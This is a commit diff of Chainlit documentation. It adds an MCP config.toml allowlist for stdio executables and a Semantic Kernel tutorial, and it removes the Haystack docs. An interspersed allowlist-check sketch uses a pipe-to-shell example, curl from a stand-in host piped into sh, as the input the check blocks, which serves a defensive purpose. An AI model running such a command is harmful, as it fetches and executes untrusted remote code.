
Commit 188b2f3 (parent: 49b6642)

add semantic kernel doc and update mcp doc

File tree: 10 files changed (+164 −160 lines)

advanced-features/mcp.mdx (+24)

````diff
@@ -40,6 +40,30 @@ Chainlit supports two types of MCP connections:
 
 <Note>**Command Availability Warning**: When using the stdio connection type with commands like `npx` or `uvx`, these commands must be available on the Chainlit server where the application is running. The subprocess is executed on the server, not on the client machine.</Note>
 
+### Server-Side Configuration (`config.toml`)
+
+You can control which MCP connection types are enabled globally and restrict allowed stdio commands by modifying your project's `config.toml` file (usually located at the root of your project or `.chainlit/config.toml`).
+
+Under the `[features.mcp]` section, you can configure SSE and stdio separately:
+
+```toml
+[features]
+# ... other feature flags
+
+[features.mcp.sse]
+# Enable or disable the SSE connection type globally
+enabled = true
+
+[features.mcp.stdio]
+# Enable or disable the stdio connection type globally
+enabled = true
+# Define an allowlist of executables for the stdio type.
+# Only the base names of executables listed here can be used.
+# This is a crucial security measure for stdio connections.
+# Example: allows running `npx ...` and `uvx ...` but blocks others.
+allowed_executables = [ "npx", "uvx" ]
+```
+
 ## Setup
 
 ### 1. Register Connection Handlers
````
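As a rough illustration of the base-name matching the new comments describe, here is a minimal sketch (a hypothetical helper, not Chainlit's actual enforcement code):

```python
import os
import shlex

ALLOWED_EXECUTABLES = ["npx", "uvx"]  # mirrors allowed_executables above

def is_command_allowed(command_line: str) -> bool:
    """Hypothetical check: permit a stdio command only if the base name
    of its executable appears in the configured allowlist."""
    tokens = shlex.split(command_line)
    if not tokens:
        return False
    # Compare base names only, so "/usr/local/bin/npx" still matches "npx".
    return os.path.basename(tokens[0]) in ALLOWED_EXECUTABLES

print(is_command_allowed("npx some-mcp-server"))          # True
print(is_command_allowed("bash -c 'curl evil.sh | sh'"))  # False
```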

api-reference/integrations/haystack.mdx (−60)

This file was deleted.

get-started/overview.mdx (+21 −30)

```diff
@@ -5,13 +5,7 @@ title: "Overview"
 Chainlit is an open-source Python package to build production ready Conversational AI.
 
 <Frame caption="Build Conversational AI with Chainlit">
-  <video
-    controls
-    autoPlay
-    loop
-    muted
-    src="/images/overview.mp4"
-  />
+  <video controls autoPlay loop muted src="/images/overview.mp4" />
 </Frame>
 
 ## Key features
@@ -31,13 +25,19 @@
 Chainlit is compatible with all Python programs and libraries. That being said, it comes with a set of integrations with popular libraries and frameworks.
 
 <CardGroup cols={2}>
-  <Card
-    title="OpenAI"
+  <Card
+    title="LangChain"
     icon="circle"
-    color="#dddddd"
-    href="/integrations/openai">
-    Learn how to explore your OpenAI calls in Chainlit.
-  </Card>
+    color="#3afadc"
+    href="/integrations/langchain"
+  >
+    Learn how to use any LangChain agent with Chainlit.
+  </Card>
+
+  {" "}
+  <Card title="OpenAI" icon="circle" color="#dddddd" href="/integrations/openai">
+    Learn how to explore your OpenAI calls in Chainlit.
+  </Card>
 
   <Card
     title="OpenAI Assistant"
@@ -58,21 +58,21 @@
   </Card>
 
   <Card
-    title="Llama Index"
+    title="Semantic Kernel"
     icon="circle"
-    color="#0285c7"
-    href="/integrations/llama-index"
+    color="#16a34a"
+    href="/integrations/semantic-kernel"
   >
-    Learn how to integrate your Llama Index code with Chainlit.
+    Learn how to integrate your Semantic Kernel code with Chainlit.
   </Card>
 
   <Card
-    title="LangChain"
+    title="Llama Index"
     icon="circle"
-    color="#3afadc"
-    href="/integrations/langchain"
+    color="#0285c7"
+    href="/integrations/llama-index"
   >
-    Learn how to use any LangChain agent with Chainlit.
+    Learn how to integrate your Llama Index code with Chainlit.
   </Card>
 
   <Card
@@ -84,13 +84,4 @@
     Learn how to integrate your Autogen agents with Chainlit.
   </Card>
 
-  <Card
-    title="Haystack"
-    icon="circle"
-    color="#16a34a"
-    href="/integrations/haystack"
-  >
-    Learn how to integrate your Haystack code with Chainlit.
-  </Card>
-
 </CardGroup>
```

integrations/haystack.mdx (−60)

This file was deleted.

integrations/litellm.mdx (+1 −1)

```diff
@@ -12,7 +12,7 @@
 
 <Warning>
   You shouldn't configure this integration if you're already using another
-  integration like Haystack, Langchain or LlamaIndex. Both integrations would
+  integration like Langchain or LlamaIndex. Both integrations would
   record the same generation and create duplicate steps in the UI.
 </Warning>
 
```

integrations/message-based.mdx (+1 −1)

```diff
@@ -5,7 +5,7 @@ title: vLLM, LMStudio, HuggingFace
 We can leverage the OpenAI instrumentation to log calls from inference servers that use messages-based API, such as vLLM, LMStudio or HuggingFace's TGI.
 
 <Warning>
-  You shouldn't configure this integration if you're already using another integration like Haystack, LangChain or LlamaIndex. Both integrations would record the same generation and create duplicate steps in the UI.
+  You shouldn't configure this integration if you're already using another integration like LangChain or LlamaIndex. Both integrations would record the same generation and create duplicate steps in the UI.
 </Warning>
 
 Create a new Python file named `app.py` in your project directory. This file will contain the main logic for your LLM application.
```
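For context, the pattern this doc describes is the standard OpenAI client pointed at a local inference server and instrumented by Chainlit. A minimal sketch (the endpoint URL and model name are illustrative; adjust them to your vLLM/LMStudio/TGI setup):

```python
import chainlit as cl
from openai import AsyncOpenAI

# Point the OpenAI client at a local messages-based inference server.
# vLLM and LMStudio typically expose an OpenAI-compatible endpoint under /v1.
client = AsyncOpenAI(base_url="http://localhost:8000/v1", api_key="not-needed")

# Instrument the client so every call is recorded as a Step in the UI.
cl.instrument_openai()

@cl.on_message
async def on_message(message: cl.Message):
    response = await client.chat.completions.create(
        model="local-model",  # illustrative; use the model your server serves
        messages=[{"role": "user", "content": message.content}],
    )
    await cl.Message(content=response.choices[0].message.content).send()
```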

integrations/mistralai.mdx (+1 −1)

```diff
@@ -6,7 +6,7 @@
 
 <Warning>
   You shouldn't configure this integration if you're already using another
-  integration like Haystack, Langchain or LlamaIndex. Both integrations would
+  integration like Langchain or LlamaIndex. Both integrations would
   record the same generation and create duplicate steps in the UI.
 </Warning>
 
```

integrations/openai.mdx (+1 −1)

```diff
@@ -16,7 +16,7 @@ You need to add `cl.instrument_openai()` after creating your OpenAI client.
 
 <Warning>
   You shouldn't configure this integration if you're already using another
-  integration like Haystack, Langchain or LlamaIndex. Both integrations would
+  integration like Langchain or LlamaIndex. Both integrations would
   record the same generation and create duplicate steps in the UI.
 </Warning>
 
```

integrations/semantic-kernel.mdx (new file, +110)

---
title: Semantic Kernel
---

In this tutorial, we'll walk through the steps to create a Chainlit application integrated with [Microsoft's Semantic Kernel](https://github.com/microsoft/semantic-kernel). The integration automatically visualizes Semantic Kernel function calls (like plugins or tools) as Steps in the Chainlit UI.

## Prerequisites

Before getting started, make sure you have the following:

- A working installation of Chainlit
- The `semantic-kernel` package installed
- An LLM API key (e.g., OpenAI, Azure OpenAI) configured for Semantic Kernel
- A basic understanding of Python programming and Semantic Kernel concepts (Kernel, Plugins, Functions)

## Step 1: Create a Python file

Create a new Python file named `app.py` in your project directory. This file will contain the main logic for your LLM application using Semantic Kernel.

## Step 2: Write the Application Logic

In `app.py`, import the necessary packages, set up your Semantic Kernel `Kernel`, add the `SemanticKernelFilter` for Chainlit integration, and define functions to handle chat sessions and incoming messages.

Here's an example demonstrating how to set up the kernel and use the filter:

```python app.py
import chainlit as cl
import semantic_kernel as sk
from semantic_kernel.connectors.ai import FunctionChoiceBehavior
from semantic_kernel.connectors.ai.open_ai import (
    OpenAIChatCompletion,
    OpenAIChatPromptExecutionSettings,
)
from semantic_kernel.functions import kernel_function
from semantic_kernel.contents import ChatHistory

request_settings = OpenAIChatPromptExecutionSettings(
    function_choice_behavior=FunctionChoiceBehavior.Auto(
        filters={"excluded_plugins": ["ChatBot"]}
    )
)

# Example Native Plugin (Tool)
class WeatherPlugin:
    @kernel_function(name="get_weather", description="Gets the weather for a city")
    def get_weather(self, city: str) -> str:
        """Retrieves the weather for a given city."""
        if "paris" in city.lower():
            return f"The weather in {city} is 20°C and sunny."
        elif "london" in city.lower():
            return f"The weather in {city} is 15°C and cloudy."
        else:
            return f"Sorry, I don't have the weather for {city}."

@cl.on_chat_start
async def on_chat_start():
    # Set up Semantic Kernel
    kernel = sk.Kernel()

    # Add your AI service (e.g., OpenAI)
    # Make sure OPENAI_API_KEY and OPENAI_ORG_ID are set in your environment
    ai_service = OpenAIChatCompletion(service_id="default", ai_model_id="gpt-4o")
    kernel.add_service(ai_service)

    # Import the WeatherPlugin
    kernel.add_plugin(WeatherPlugin(), plugin_name="Weather")

    # Instantiate and add the Chainlit filter to the kernel
    # This will automatically capture function calls as Steps
    sk_filter = cl.SemanticKernelFilter(kernel=kernel)

    cl.user_session.set("kernel", kernel)
    cl.user_session.set("ai_service", ai_service)
    cl.user_session.set("chat_history", ChatHistory())

@cl.on_message
async def on_message(message: cl.Message):
    kernel = cl.user_session.get("kernel")  # type: sk.Kernel
    ai_service = cl.user_session.get("ai_service")  # type: OpenAIChatCompletion
    chat_history = cl.user_session.get("chat_history")  # type: ChatHistory

    # Add the user message to the history
    chat_history.add_user_message(message.content)

    # Create a Chainlit message for the response stream
    answer = cl.Message(content="")

    async for msg in ai_service.get_streaming_chat_message_content(
        chat_history=chat_history,
        user_input=message.content,
        settings=request_settings,
        kernel=kernel,
    ):
        if msg.content:
            await answer.stream_token(msg.content)

    # Add the full assistant response to the history
    chat_history.add_assistant_message(answer.content)

    # Send the final message
    await answer.send()
```

## Step 3: Run the Application

To start your app, open a terminal and navigate to the directory containing `app.py`. Then run the following command:

```bash
chainlit run app.py -w
```

The `-w` flag tells Chainlit to enable auto-reloading, so you don't need to restart the server every time you make changes to your application. Your chatbot UI should now be accessible at http://localhost:8000. Interact with the bot; if you ask for the weather (and the LLM uses the tool), you should see a "Weather-get_weather" step appear in the UI.
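To sanity-check the plugin outside the UI, here is a minimal standalone sketch (assuming the `WeatherPlugin` from `app.py` above, and a recent `semantic-kernel` release where `Kernel.invoke` accepts `plugin_name`/`function_name` keyword arguments):

```python
import asyncio
import semantic_kernel as sk

from app import WeatherPlugin  # the plugin defined in app.py above

async def main():
    kernel = sk.Kernel()
    kernel.add_plugin(WeatherPlugin(), plugin_name="Weather")

    # Invoke the native function directly, bypassing the LLM entirely.
    result = await kernel.invoke(
        plugin_name="Weather", function_name="get_weather", city="Paris"
    )
    print(result)  # The weather in Paris is 20°C and sunny.

asyncio.run(main())
```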
